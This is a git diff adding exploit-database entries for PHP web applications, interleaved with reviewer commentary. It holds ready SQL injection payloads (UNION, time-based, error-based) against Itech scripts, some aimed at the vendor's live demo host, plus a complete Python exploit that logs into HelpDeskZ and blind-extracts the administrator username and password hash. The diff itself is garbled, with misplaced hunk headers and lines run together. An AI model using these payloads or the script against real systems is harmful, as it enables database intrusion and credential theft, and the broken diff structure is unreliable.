diff --git a/platforms/php/webapps/41195.txt b/platforms/php/webapps/41195.txt
new file mode 100755
index 000000000..c007ef93a
--- /dev/null
+++ b/platforms/php/webapps/41195.txt
@@ -0,0 +1,34 @@
+Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/real-estate-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+http://localhost/real-estate-script/search_property.php?property_for=1[payload]
+
+Parameter: property_for (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: property_for=1 AND 4574=4574
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: property_for=1 AND SLEEP(5)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo
diff --git a/platforms/php/webapps/41197.txt b/platforms/php/webapps/41197.txt
new file mode 100755
index 000000000..82bc35b81
--- /dev/null
+++ b/platforms/php/webapps/41197.txt
@@ -0,0 +1,35 @@
+# # # # #
+# Exploit Title: PHP Product Designer Script - Arbitrary File Upload
+# Google Dork: N/A
+# Date: 30.01.2017
+# Vendor Homepage: https://codecanyon.net/item/php-product-designer/19334412
+# Software Buy: https://codecanyon.net/item/php-product-designer/19334412
+# Demo: http://phpproductdesigner.000webhostapp.com/products.php
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/products.php / Create New Design
+# http://localhost/[PATH]/theme/images/uploads/[......PHP]
+# # # # #
+# uploadImage.php
+
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41198.txt b/platforms/php/webapps/41198.txt
new file mode 100755
index 000000000..92f848f44
--- /dev/null
+++ b/platforms/php/webapps/41198.txt
@@ -0,0 +1,35 @@
+# # # # #
+# Exploit Title: PHP Logo Designer Script - Arbitrary File Upload
+# Google Dork: N/A
+# Date: 30.01.2017
+# Vendor Homepage: https://codecanyon.net/item/php-logo-designer/19362231
+# Software Buy: https://codecanyon.net/item/php-logo-designer/19362231
+# Demo: http://phplogodesigner.000webhostapp.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/designer.php
+# http://localhost/[PATH]/theme/images/uploads/[......PHP]
+# # # # #
+# uploadImage.php
+
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41199.txt b/platforms/php/webapps/41199.txt
new file mode 100755
index 000000000..5795626b6
--- /dev/null
+++ b/platforms/php/webapps/41199.txt
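Review bot: The hunk header for 41197.txt announces 35 added lines but only about 21 are visible, and the trailing `# uploadImage.php` line is followed by a single empty line where the request or form exercising that handler would be expected, so the proof-of-concept body appears to have been lost — possibly stripped on import if it was HTML — and should be checked against the author's original. 41198.txt shows the identical gap under the same 35-line header. As committed, each advisory records only the handler name and the `theme/images/uploads/` path, which is too little for a vendor to confirm the finding or for a defender to validate a fix.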
@@ -0,0 +1,38 @@
+Exploit Title: Video Sharing Script 4.94 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/video-sharing-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Video Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]
+
+Parameter: #1* (URI)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 26 columns
+ Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
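Review bot: The Vulnerability line gives the target as `http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]`, but all four sqlmap payloads below it are addressed to `http://video-sharing.itechscripts.com:80/...`, the vendor's public demo host, so the advisory is inconsistent about where testing was performed. Replacing the demo hostname with the `localhost` placeholder used in the sibling advisories (41193.txt, 41194.txt, 41195.txt) would keep the report self-consistent and avoid publishing request strings aimed at a live third-party system. As with the other Kaan KAMIS advisories in this commit, no vendor-notification or disclosure date is given.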
diff --git a/platforms/php/webapps/41200.py b/platforms/php/webapps/41200.py
new file mode 100755
index 000000000..434c9ea39
--- /dev/null
+++ b/platforms/php/webapps/41200.py
@@ -0,0 +1,172 @@ +''' +# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download +# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket +# Date: 2017-01-30 +# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl ) +# Vendor Homepage: http://www.helpdeskz.com/ +# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip +# Version: <= v1.0.2 +# Tested on: +# CVE : + +HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments. + +Software after ticket submit allow to download attachment by entering following link: +http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1(ATTACHMENT_ID_HERE) + +FILE: view_tickets_controller.php +LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]); + +third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization + + +Steps to reproduce: + +http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket¶m[]=2(VALID_TICKET_ID_HERE)¶m[]=attachment¶m[]=1¶m[]=1 or id>0 -- - + + +by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment. + +Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD) + +steps: +1. go to http://192.168.100.115/helpdesk/?v=submit_ticket +2. Submit a ticket with valid email (important we need password access). +3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query). +4. Get the password from email. +4. 
run script + +root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123 + +where http://192.168.100.115/helpdesk/ = base url to helpdesk +localhost@localhost.com = email which we use to submit the ticket +password123 = password that system sent to our email + +Output of script: +root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123 +2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk +2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/ +2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login +2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets +2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket¶m[]=6¶m[]=attachment¶m[]=1¶m[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20- +... +------------------------------------------ +username: admin +password: sha256(53874ea55571329c04b6998d9c7772c9274d3781) + +''' +import requests +import sys + +if( len(sys.argv) < 3): + print "put proper data like in example, remember to open a ticket before.... 
" + print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123" + exit() +EMAIL = sys.argv[2] +PASSWORD = sys.argv[3] + +URL = sys.argv[1] + +def get_token(content): + token = content + if "csrfhash" not in token: + return "error" + token = token[token.find('csrfhash" value="'):len(token)] + if '" />' in token: + token = token[token.find('value="')+7:token.find('" />')] + else: + token = token[token.find('value="')+7:token.find('"/>')] + return token + +def get_ticket_id(content): + ticketid = content + if "param[]=" not in ticketid: + return "error" + ticketid = ticketid[ticketid.find('param[]='):len(ticketid)] + ticketid = ticketid[8:ticketid.find('"')] + return ticketid + + +def main(): + + # Start a session so we can have persistant cookies + session = requests.session(config={'verbose': sys.stderr}) + + r = session.get(URL+"") + + #GET THE TOKEN TO LOGIN + TOKEN = get_token(r.content) + if(TOKEN=="error"): + print "cannot find token" + exit(); + #Data for login + login_data = { + 'do': 'login', + 'csrfhash': TOKEN, + 'email': EMAIL, + 'password': PASSWORD, + 'btn': 'Login' + } + + # Authenticate + r = session.post(URL+"/?v=login", data=login_data) + #GET ticketid + ticket_id = get_ticket_id(r.content) + if(ticket_id=="error"): + print "ticketid not found, open a ticket first" + exit() + target = URL +"?v=view_tickets&action=ticket¶m[]="+ticket_id+"¶m[]=attachment¶m[]=1¶m[]=1" + + limit = 1 + char = 47 + prefix=[] + while(char!=123): + target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_prefix).content + if "couldn't find" not in response: + prefix.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + table_prefix = ''.join(chr(i) for i in prefix) + table_prefix = table_prefix[0:table_prefix.find('staff')] + + limit = 1 + char = 47 + admin_u=[] + 
while(char!=123): + target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_username).content + if "couldn't find" not in response: + admin_u.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + + limit = 1 + char = 47 + admin_pw=[] + while(char!=123): + target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -" + response = session.get(target_password).content + if "couldn't find" not in response: + admin_pw.append(char) + limit=limit+1 + char=47 + else: + char=char+1 + + + admin_username = ''.join(chr(i) for i in admin_u) + admin_password = ''.join(chr(i) for i in admin_pw) + + print "------------------------------------------" + print "username: "+admin_username + print "password: sha256("+admin_password+")" + if admin_username=="" and admin_password=='': + print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_" + print "try to submit ticket with attachment" +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/platforms/php/webapps/41201.txt b/platforms/php/webapps/41201.txt new file mode 100755 index 000000000..e04062220 --- /dev/null +++ b/platforms/php/webapps/41201.txt 
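Review bot: The argument check at the top of the script, `if( len(sys.argv) < 3):`, is off by one: `PASSWORD = sys.argv[3]` two lines later needs four entries, so a call with exactly three arguments passes the check and dies with an IndexError instead of printing the usage text; it should be `if len(sys.argv) < 4:`. The header leaves `# Tested on:` and `# CVE :` blank, and `requests.session(config={'verbose': sys.stderr})` uses a `config` keyword that, as far as I recall, current requests releases no longer accept, so the requests version the script was run against should be documented. From a monitoring standpoint, the three character-by-character loops issue one request per candidate byte, so the server-side signature is a burst of requests whose query string carries `information_schema.columns` and `ascii(substr(`; a web-server-log or WAF rule on that pattern would flag this class of probe.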
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Itech Classifieds Script v7.27 - 'pid' Parameter SQL Injection
+# Google Dork: N/A
+# Date: 30.01.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/classifieds-script/
+# Demo: http://itechscripts.com/classifieds-script/
+# Version: 7.27
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/message.php?pid=[SQL]
+# E.t.c
+# # # # #
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/41202.txt b/platforms/php/webapps/41202.txt
new file mode 100755
index 000000000..af4b9eb17
--- /dev/null
+++ b/platforms/php/webapps/41202.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Itech Dating Script v3.26 - 'send_gift.php' SQL Injection
+# Google Dork: N/A
+# Date: 30.01.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/dating-script/
+# Demo: http://dating.itechscripts.com/
+# Version: 3.26
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/send_gift.php?id=[SQL]
+# E.t.c
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41203.txt b/platforms/php/webapps/41203.txt
new file mode 100755
index 000000000..4879f0c09
--- /dev/null
+++ b/platforms/php/webapps/41203.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Itech Real Estate Script v3.12 - 'id' Parameter SQL Injection
+# Google Dork: N/A
+# Date: 30.01.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/real-estate-script/
+# Demo: http://real-estate.itechscripts.com
+# Version: 3.12
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/agent_search_property.php?id=[SQL]
+# E.t.c
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/11112.c b/platforms/win_x86/local/11112.c
similarity index 100%
rename from platforms/windows/local/11112.c
rename to platforms/win_x86/local/11112.c
diff --git a/platforms/windows/local/18861.php b/platforms/win_x86/local/18861.php
similarity index 96%
rename from platforms/windows/local/18861.php
rename to platforms/win_x86/local/18861.php
index 0ead77896..660fc68ad 100755
--- a/platforms/windows/local/18861.php
+++ b/platforms/win_x86/local/18861.php
@@ -13,7 +13,7 @@ 0day
PHP 5.4.3 0day by 0in & cOndis
-